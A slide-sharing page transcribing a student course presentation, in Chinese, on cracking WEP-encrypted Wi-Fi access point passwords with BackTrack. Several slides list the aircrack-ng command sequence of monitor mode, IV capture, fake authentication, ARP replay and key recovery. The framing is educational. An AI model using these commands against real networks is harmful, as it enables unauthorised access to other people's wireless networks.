1 / 10

利用 BackTrack 破解無線 AP 密碼

利用 BackTrack 破解無線 AP 密碼. 無線網路安全性設計實務. 01. 組員: 姚芳德、蘇文淵、陳天晟、洪紹祥. Introduction. 現在無線 WIFI 主要使用 WEP,WPA,WPA2 加密模式。 WEP 無線加密模式有著最好的兼容性,無線 AP 無線網卡都支持此種加密,可是因此也留下了最容易破解的先天不足. 02. BackTarack.

Download Presentation

利用 BackTrack 破解無線 AP 密碼

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. 利用BackTrack 破解無線AP密碼 無線網路安全性設計實務 01 組員: 姚芳德、蘇文淵、陳天晟、洪紹祥

  2. Introduction 現在無線WIFI主要使用WEP,WPA,WPA2加密模式。WEP無線加密模式有著最好的兼容性,無線AP無線網卡都支持此種加密,可是因此也留下了最容易破解的先天不足 02

  3. BackTarack It's evolved from the merge of the two wide spread distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. 03

  4. Wireless Card 無線網卡 由于各種網卡采用的芯片不同,可能某些功能未能實現。推薦 Prisam 2 或 Atheros 芯片。IBM比電內置的無線網卡通常有兩種:Intel 或 IBM。IBM 用的就是 Atheros 芯片。不建議使用 Intel 芯片,因為其設計上的原因,抓封包有問題,而且不能順利發攻擊包。如果買 PCMCIA 網卡,推薦 Netgear WAG511,在這邊我們使用了D-link DWL-G122來作為實驗的網卡。 04

  5. Wireless Card 05

  6. Aircrack Overview 1.Ifconfig wlan0 2. airmon start wlan0 3. airodump-ng --output-format ivs --ivs -w ivsfile -c 1 mon0 4. aireplay-ng -1 0 –e j20XX wlan0 5. aireplay-ng -3 -b ap_mac  -x 1024 wlan0 5. aireplay-ng -5 -b ApMac wlan0 6. aircrack-ng -n 64 -b ap_mac name-01.ivs 06

  7. Aircrack Step 1 airodump-ng --output-format ivs --ivs -w ivsfile -c 1 mon0 07

  8. Aircrack Step 2 aireplay-ng -3 -b ap_mac  -x 1024 wlan0 08

  9. Aircrack Step 3 aircrack-ng -n 64 -b ap_mac name-01.ivs Opps 09

  10. Check it out! 10 END

More Related